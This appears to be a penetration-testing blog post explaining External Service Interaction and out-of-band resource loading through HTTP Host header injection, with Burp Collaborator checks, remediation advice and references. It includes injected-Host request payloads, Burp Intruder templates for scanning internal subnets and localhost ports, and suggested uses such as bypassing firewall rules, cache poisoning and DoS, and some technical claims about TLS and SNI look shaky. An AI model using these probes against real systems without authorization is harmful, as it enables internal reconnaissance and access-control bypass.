In the recent past, we encountered two relatively new types of attack: External Service Interaction (ESI) and Out-of-band resource load (OfBRL).

- An ESI [1] occurs only when a web application allows interaction with an arbitrary external service.

- OfBRL [6] arises when it is possible to induce an application to fetch content from an arbitrary external location, and incorporate that content into the application's own response(s).

The Problem with OfBRL

The ability to request and retrieve web content from other systems can allow the application server to be used as a two-way attack proxy (when OfBRL is applicable) or a one-way proxy (when ESI is applicable). By submitting suitable payloads, an attacker can cause the application server to attack, or retrieve content from, other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.

The Problem with ESI

External service interaction arises when it is possible to induce an application to interact with an arbitrary external service, such as a web or mail server. The ability to trigger arbitrary external service interactions does not constitute a vulnerability in its own right, and in some cases might even be the intended behavior of the application. However, in many cases, it can indicate a vulnerability with serious consequences.

The Verification

We do not have ESI or OfBRL when:

- In Collaborator, the source IP of the interaction is our own browser's IP

- There is a 302 redirect from our hosts to the Collaborator (aka. our own source IP appears in Collaborator)
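Both checks boil down to the same rule: an interaction only counts if it did not come from us. A minimal Python sketch, assuming the Collaborator interactions have been exported as (protocol, source IP) pairs; the `Interaction` type, the function name and the sample addresses (documentation ranges) are hypothetical and not part of Burp's API:

```python
from dataclasses import dataclass
from typing import Iterable, List


@dataclass(frozen=True)
class Interaction:
    # Hypothetical record of one Collaborator interaction (not Burp's API).
    protocol: str   # e.g. "DNS" or "HTTP"
    source_ip: str  # address that contacted the Collaborator server


def server_side_interactions(interactions: Iterable[Interaction], our_ip: str) -> List[Interaction]:
    """Drop interactions that originated from our own machine.

    If the source IP is ours (e.g. our browser followed a 302 redirect to the
    Collaborator domain), the interaction does not indicate ESI or OfBRL.
    """
    return [i for i in interactions if i.source_ip != our_ip]
```

For example, with `our_ip="203.0.113.10"`, an HTTP interaction from `203.0.113.10` is discarded, while a DNS interaction from `198.51.100.7` (e.g. a resolver used by the target) is kept for a closer look.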



Below we can see the original configuration in Repeater:

The RFC(s)

It is usually a platform issue, not an application one. In some scenarios, for example with a CGI application, the HTTP headers are handled by the application itself (aka. the app dynamically manipulates the HTTP headers to run properly). This means that HTTP headers such as Location and Host are handled by the app, and therefore a vulnerability might exist. If you own a critical application that handles these headers itself, it is recommended to run HTTP header integrity checks.
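A Host header integrity check can be as simple as refusing any request whose Host value is not one the application actually serves. The sketch below uses a Python WSGI middleware as a stand-in for the CGI case described above (a swapped-in technique, not the author's setup); `ALLOWED_HOSTS` and `host_integrity_middleware` are hypothetical names:

```python
from typing import Callable, Iterable

# Hypothetical allowlist: the Host values this application really serves.
ALLOWED_HOSTS = {"our_vulnerableapp.com", "our_vulnerableapp.com:443"}


def host_integrity_middleware(app: Callable, allowed: Iterable[str] = ALLOWED_HOSTS) -> Callable:
    """Wrap a WSGI app so that requests with an unexpected Host header are rejected."""
    allowed_set = {h.lower() for h in allowed}

    def wrapper(environ, start_response):
        host = environ.get("HTTP_HOST", "").lower()
        if host not in allowed_set:
            # Reject before the app can build Location URLs or fetch content for this host.
            start_response("400 Bad Request", [("Content-Type", "text/plain")])
            return [b"Invalid Host header\n"]
        return app(environ, start_response)

    return wrapper
```

Rejecting early keeps the check in one place instead of trusting every code path in the app to validate Host on its own.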

For more information on the subject, read RFC 2616 [2], where the use of the headers is explained in detail. The Host request-header field specifies the Internet host and port number of the resource being requested, as obtained from the original URI given by the user or referring resource (generally an HTTP URL). The Host field value MUST represent the naming authority of the origin server or gateway given by the original URL. This allows the origin server or gateway to differentiate between internally-ambiguous URLs, such as the root "/" URL of a server for multiple host names on a single IP address.
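Since the Host value carries both the hostname and an optional port, any check on it should split the two consistently. A minimal sketch, assuming the `host [ ":" port ]` form from RFC 2616 plus bracketed IPv6 literals; `parse_host_header` is a hypothetical helper:

```python
from typing import Tuple


def parse_host_header(value: str, default_port: int = 80) -> Tuple[str, int]:
    """Split a Host header value into (host, port); the port falls back to default_port."""
    value = value.strip()
    if value.startswith("["):
        # Bracketed IPv6 literal, e.g. "[::1]:8080".
        end = value.index("]")
        host, rest = value[1:end], value[end + 1:]
        port = rest[1:] if rest.startswith(":") else ""
        return host, int(port) if port else default_port
    host, sep, port = value.rpartition(":")
    if not sep:
        return value, default_port          # no port given at all
    return host, int(port) if port else default_port  # "host:" means default port
```

For example, `parse_host_header("127.0.0.1:8080")` gives `("127.0.0.1", 8080)`, matching one of the injected Host values used later on.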

When TLS is enforced throughout the whole application (even the root path /), an ESI or OfBRL via the Host header is typically not possible. The TLS connection is bound to the server name negotiated during the handshake: the client announces that name via SNI and validates the server certificate against it. A request whose Host header points at a different host no longer matches the negotiated name, and more specifically we are going to get an SNI error.

SNI prevents what's known as a "common name mismatch error": when a client (user) device reaches the IP address for a vulnerable app, but the name on the SSL/TLS certificate doesn't match the name of the website [9]. SNI was added to the IETF's Internet RFCs in June 2003 through RFC 3546, Transport Layer Security (TLS) Extensions. The latest version of the standard is RFC 6066.
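The two names involved can be observed separately with Python's standard `ssl` module: the name passed as `server_hostname` is sent as SNI and checked against the certificate, while the Host header is just text sent afterwards. A sketch, assuming a target reachable on port 443; `probe_sni_vs_host` is a hypothetical helper, and how a given server reacts to a mismatch between SNI and Host depends on its configuration:

```python
import socket
import ssl


def make_tls_context() -> ssl.SSLContext:
    # Default context: verifies the certificate chain and checks that the
    # certificate matches server_hostname (the same name sent as SNI).
    return ssl.create_default_context()


def probe_sni_vs_host(ip: str, sni_name: str, host_header: str,
                      port: int = 443, timeout: float = 5.0) -> bytes:
    """Send `sni_name` as SNI, then a request whose Host header is `host_header`.

    Returns the first chunk of the response. Raises ssl.SSLCertVerificationError
    if the server's certificate does not match `sni_name`.
    """
    ctx = make_tls_context()
    with socket.create_connection((ip, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=sni_name) as tls:
            request = (
                "GET / HTTP/1.1\r\n"
                f"Host: {host_header}\r\n"
                "Connection: close\r\n\r\n"
            ).encode("ascii")
            tls.sendall(request)
            return tls.recv(4096)
```

Calling it with the target IP, the legitimate name as `sni_name` and `malicious.com` as `host_header` shows whether the server enforces the binding described above; a certificate that does not match `sni_name` raises `ssl.SSLCertVerificationError` before any request is sent.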

The option to trigger an arbitrary external service interaction does not constitute a vulnerability in its own right, and in some cases it might be the intended behavior of the application. But as hackers we want to exploit it, right? So what can we do with an ESI or an Out-of-band resource load?

The Infrastructure

Well, it depends on the overall setup! The juiciest scenarios are the following:

- The application is behind a WAF (with restrictive ACLs)

- The application is behind a UTM (with restrictive ACLs)

- The server is running multiple applications in a virtual environment

- The application is running behind a NAT.

In order to perform the hack, we simply have to inject our own host value into the HTTP Host header (hostname, including port). Below is a simple diagram explaining the vulnerability.

Below we can see the HTTP requests with the injected Host header:

Original request:

```http
GET / HTTP/1.1
Host: our_vulnerableapp.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
```

Malicious requests:

```http
GET / HTTP/1.1
Host: malicious.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
```

or

```http
GET / HTTP/1.1
Host: 127.0.0.1:8080
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
```
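The injected requests above can be reproduced outside Burp with a raw socket, since many HTTP client libraries set the Host header from the URL by default. A minimal sketch using only the Python standard library; `build_request` and `send_raw` are hypothetical helpers, and the target IP is whatever address the vulnerable application really listens on:

```python
import socket


def build_request(host_header: str, path: str = "/") -> bytes:
    """Build a raw HTTP/1.1 request mirroring the ones above, with an injected Host value."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host_header}",
        "Pragma: no-cache",
        "Cache-Control: no-cache, no-transform",
        "Connection: close",
        "",  # the two empty entries produce the blank line ending the headers
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def send_raw(target_ip: str, host_header: str, port: int = 80, timeout: float = 5.0) -> bytes:
    """Connect to the real target but claim a different Host; return the full response."""
    chunks = []
    with socket.create_connection((target_ip, port), timeout=timeout) as s:
        s.sendall(build_request(host_header))
        while True:
            data = s.recv(4096)
            if not data:  # server closed the connection (Connection: close)
                break
            chunks.append(data)
    return b"".join(chunks)
```

For example, `send_raw(target_ip, "127.0.0.1:8080")` sends the third request above to the real server while claiming a loopback Host.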

If the application is vulnerable to OfBRL, the reply from the injected host is processed by the vulnerable application, bounces back to the sender (aka. the hacker) and potentially loads in the context of the application. If the reply does not come back to the sender, we might have an ESI instead, and further investigation is required.
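The decision above can be written down as a small function. A sketch, assuming the injected host (for instance a Collaborator domain) serves a unique marker string and that we can see both its interaction log and the application's reply; `Finding` and `classify` are hypothetical names:

```python
from enum import Enum


class Finding(Enum):
    NONE = "no interaction"
    ESI = "external service interaction (one-way)"
    OFBRL = "out-of-band resource load (two-way)"


def classify(interaction_seen: bool, app_response: str, marker: str) -> Finding:
    """Classify a probe.

    interaction_seen: the injected host was contacted by the server.
    marker: unique content served by that host; if it appears in the app's
    reply, the fetched content was incorporated into the response.
    """
    if marker and marker in app_response:
        return Finding.OFBRL  # content came back to us: two-way
    if interaction_seen:
        return Finding.ESI    # server reached out, nothing came back: one-way
    return Finding.NONE
```

The marker check comes first because a reflected marker implies the fetch happened, even if the interaction log was missed.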

Out-of-band resource load:

ESI:

Below we can see the configuration in Intruder:

We simply use the Sniper attack mode in Intruder and can do the following:

- Rotate through different ports, using the vulnapp.com domain name.

- Rotate through different ports, using the vulnapp.com external IP.

- Rotate through different ports, using the vulnapp.com internal IP, if applicable.

- Rotate through different internal IP(s) in the same domain, if applicable.

- Rotate through different protocols (this might not always work, by the way).

- Brute force directories on identified DMZ hosts.
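The Host header values for these rotations can be generated up front and loaded into Intruder as a simple list payload. A sketch; `COMMON_PORTS`, `host_payloads` and `subnet_hosts` are hypothetical, and the port list is only an illustration:

```python
import ipaddress
from typing import Iterable, Iterator

# Hypothetical port list, for illustration only.
COMMON_PORTS = [21, 22, 25, 80, 443, 8080, 8443]


def host_payloads(hosts: Iterable[str], ports: Iterable[int]) -> Iterator[str]:
    """Yield "host:port" Host header values for every (host, port) pair."""
    port_list = list(ports)  # materialize so it can be reused for every host
    for host in hosts:
        for port in port_list:
            yield f"{host}:{port}"


def subnet_hosts(cidr: str) -> Iterator[str]:
    """Yield the usable host addresses of an internal subnet such as "192.168.1.0/24"."""
    for ip in ipaddress.ip_network(cidr).hosts():
        yield str(ip)
```

For example, writing `"\n".join(host_payloads(subnet_hosts("192.168.1.0/24"), COMMON_PORTS))` to a file gives one payload per line.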

The Test

Burp Suite Professional has a feature named Collaborator. Burp Collaborator is a network service that Burp Suite uses to help discover vulnerabilities such as ESI and OfBRL [3]. A typical example is using Burp Collaborator to test whether ESI exists. Below we describe such an interaction.

Original request:

```http
GET / HTTP/1.1
Host: our_vulnerableapp.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
```

Burp Collaborator request:

```http
GET / HTTP/1.1
Host: edgfsdg2zjqjx5dwcbnngxm62pwykabg24r.burpcollaborator.net
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: keep-alive
```

Burp Collaborator response:

```http
HTTP/1.1 200 OK
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Content-Type: text/html
Content-Length: 53

<html><body>drjsze8jr734dsxgsdfl2y18bm1g4zjjgz</body></html>
```
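The Collaborator host in the request above is a unique subdomain, which is what lets an interaction be tied back to the request that caused it. When probing several endpoints by hand, the same idea can be applied with one random subdomain per endpoint. A sketch; `make_probe_hosts`, `endpoint_for` and `collab.example` are hypothetical placeholders for the real Collaborator domain:

```python
import secrets
from typing import Dict, Iterable, Optional


def make_probe_hosts(endpoints: Iterable[str], collaborator_domain: str) -> Dict[str, str]:
    """Map a fresh random subdomain of the collaborator domain to each endpoint."""
    domain = collaborator_domain.lower().rstrip(".")
    return {f"{secrets.token_hex(8)}.{domain}": ep for ep in endpoints}


def endpoint_for(interaction_host: str, probes: Dict[str, str]) -> Optional[str]:
    """Return the endpoint whose probe host was contacted, or None if unknown."""
    return probes.get(interaction_host.lower().rstrip("."))
```

Each generated host goes into the Host header of one request; when an interaction shows up, `endpoint_for` tells us which endpoint triggered it.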

The Post Exploitation

OK, now as hacker artists, let's think about how to exploit this. The scenarios are [7][8]:

- Attempt to load the local admin panels.

- Attempt to load the admin panels of surrounding applications.

- Attempt to interact with other services in the DMZ.

- Attempt to port scan localhost

- Attempt to port scan the DMZ hosts

- Use it to exploit the IP trust and run a DoS attack against other systems

A good option for that would be Burp Intruder. Burp Intruder is a tool for automating customized attacks against web applications. It is extremely powerful and configurable, and can be used to perform a huge range of tasks, from simple brute-force guessing of web directories through to active exploitation of complex blind SQL injection vulnerabilities.

Burp Intruder configuration for scanning surrounding hosts:

```http
GET / HTTP/1.1
Host: 192.168.1.§§
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
```

Burp Intruder configuration for port scanning surrounding hosts:

```http
GET / HTTP/1.1
Host: 192.168.1.1:§§
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
```

Burp Intruder configuration for port scanning localhost:

```http
GET / HTTP/1.1
Host: 127.0.0.1:§§
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close
```
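Sniper mode uses a single payload set and places each payload into one marked position at a time, leaving the text of the other positions unchanged. A minimal Python emulation of that substitution, useful for checking what Intruder will actually send; `sniper` is a hypothetical helper, not Burp code:

```python
import re
from typing import Iterable, Iterator

# A payload position is text enclosed in a pair of § markers (possibly empty).
MARKER = re.compile(r"§[^§]*§")


def sniper(template: str, payloads: Iterable[str]) -> Iterator[str]:
    """Yield one request per (position, payload): the targeted position gets the
    payload, every other position keeps the text between its markers."""
    payload_list = list(payloads)
    matches = list(MARKER.finditer(template))
    for target in range(len(matches)):
        for payload in payload_list:
            parts, last = [], 0
            for i, m in enumerate(matches):
                parts.append(template[last:m.start()])
                parts.append(payload if i == target else m.group(0)[1:-1])
                last = m.end()
            parts.append(template[last:])
            yield "".join(parts)
```

With the first template above and payloads `[str(n) for n in range(1, 255)]`, this yields one request per address from `192.168.1.1` to `192.168.1.254`.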

What Can You Do

The big hack analysis: this vulnerability can be used in the following ways:

- Bypass restrictive UTM ACL(s)

- Bypass restrictive WAF Rule(s)

- Bypass restrictive FW ACL(s)

- Perform cache poisoning

- Fingerprint internal infrastructure

- Perform DoS exploiting the IP trust

- Exploit applications hosted on the same machine (aka. multiple app loads)

Below we can see a schematic analysis of bypassing ACL(s):

The impact of a maliciously constructed response can be magnified if it is cached either by a web cache used by multiple users or even the browser cache of a single user. If a response is cached in a shared web cache, such as those commonly found in proxy servers, then all users of that cache will continue to receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, then that user will continue to receive the malicious content until the cache entry is purged, although only the user of the local browser instance will be affected. [5]
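The toy model below shows why the cache key matters: if a shared cache keys entries on the path alone, the first response generated for an injected Host is served to everyone else. A sketch under that assumption; `PathOnlyCache` and the `origin` function (an app that builds links from the Host header) are hypothetical:

```python
from typing import Callable, Dict


class PathOnlyCache:
    """Toy shared cache that keys entries on the path alone and ignores the Host header."""

    def __init__(self, origin: Callable[[str, str], str]):
        self.origin = origin              # origin(host, path) -> response body
        self.store: Dict[str, str] = {}

    def get(self, host: str, path: str) -> str:
        if path not in self.store:        # miss: forward to the origin and cache the result
            self.store[path] = self.origin(host, path)
        return self.store[path]           # hit: same body for every user, whatever Host they sent


def origin(host: str, path: str) -> str:
    # Hypothetical application that builds an absolute link from the Host header it receives.
    return f'<script src="http://{host}/app.js"></script>'
```

After `PathOnlyCache(origin).get("malicious.com", "/")`, a later request for `/` with the legitimate Host receives the cached script tag pointing at `malicious.com` until the entry is purged.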

Below follows the schematic analysis:

What Can't You Do

You cannot perform XSS or CSRF by exploiting this vulnerability, unless certain conditions apply.

The fix

If the ability to trigger arbitrary ESI or OfBRL is not intended behavior, then you should implement a whitelist of permitted URLs, and block requests to URLs that do not appear on this whitelist. [6] Running host integrity checks is also recommended. [6]
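A minimal whitelist check for outbound URLs, assuming the application fetches content from URLs it receives; `ALLOWED_URL_HOSTS` and `is_permitted_url` are hypothetical. Matching the parsed hostname exactly, rather than searching the raw string, avoids tricks such as `http://allowed.host@evil.host/`:

```python
from urllib.parse import urlsplit

# Hypothetical whitelist; populate with the hosts the feature legitimately needs.
ALLOWED_URL_HOSTS = {"api.partner.example", "cdn.partner.example"}


def is_permitted_url(url: str, allowed=ALLOWED_URL_HOSTS) -> bool:
    """Allow only http(s) URLs whose hostname is exactly on the whitelist."""
    parts = urlsplit(url)  # scheme and hostname come back lowercased
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").rstrip(".")
    return host in allowed
```

Anything not explicitly listed, including `127.0.0.1`, internal hostnames and other schemes such as `file://`, is refused.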

We should review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary external service interactions is intended behavior. If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures. These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter. [6]

More specifically we can:

- Apply egress filtering on the DMZ

- Apply egress filtering on the host

- Apply whitelist IP restrictions in the app

- Apply blacklist restrictions in the app (although not recommended)
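For the IP whitelist, the address a hostname resolves to should be checked, not just the name. A sketch using the `ipaddress` module; `ALLOWED_NETWORKS` (a documentation range here), `ip_is_allowed` and `resolve_and_check` are hypothetical:

```python
import ipaddress
import socket
from typing import List

# Hypothetical whitelist of destination networks (a documentation range here).
ALLOWED_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]


def ip_is_allowed(ip: str, networks=ALLOWED_NETWORKS) -> bool:
    """True only if the address falls inside one of the whitelisted networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)


def resolve_and_check(hostname: str, port: int = 443) -> List[str]:
    """Resolve hostname and return its addresses, refusing if any is off the whitelist."""
    infos = socket.getaddrinfo(hostname, port, proto=socket.IPPROTO_TCP)
    addrs = sorted({info[4][0] for info in infos})
    if not addrs or not all(ip_is_allowed(a) for a in addrs):
        raise PermissionError(f"{hostname} resolves outside the IP whitelist: {addrs}")
    return addrs
```

To avoid DNS rebinding, the application should then connect to an address that passed the check rather than resolving the name a second time.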

References:

- [1] https://portswigger.net/kb/issues/00300200_external-service-interaction-dns

- [2] https://tools.ietf.org/html/rfc2616

- [3] https://portswigger.net/burp/documentation/collaborator

- [4] https://portswigger.net/burp/documentation/desktop/tools/intruder/using

- [5] https://owasp.org/www-community/attacks/Cache_Poisoning

- [6] https://portswigger.net/kb/issues/00100a00_out-of-band-resource-load-http

- [7] CWE-918: Server-Side Request Forgery (SSRF)

- [8] CWE-406: Insufficient Control of Network Message Volume (Network Amplification)

- [9] https://www.cloudflare.com/learning/ssl/what-is-sni/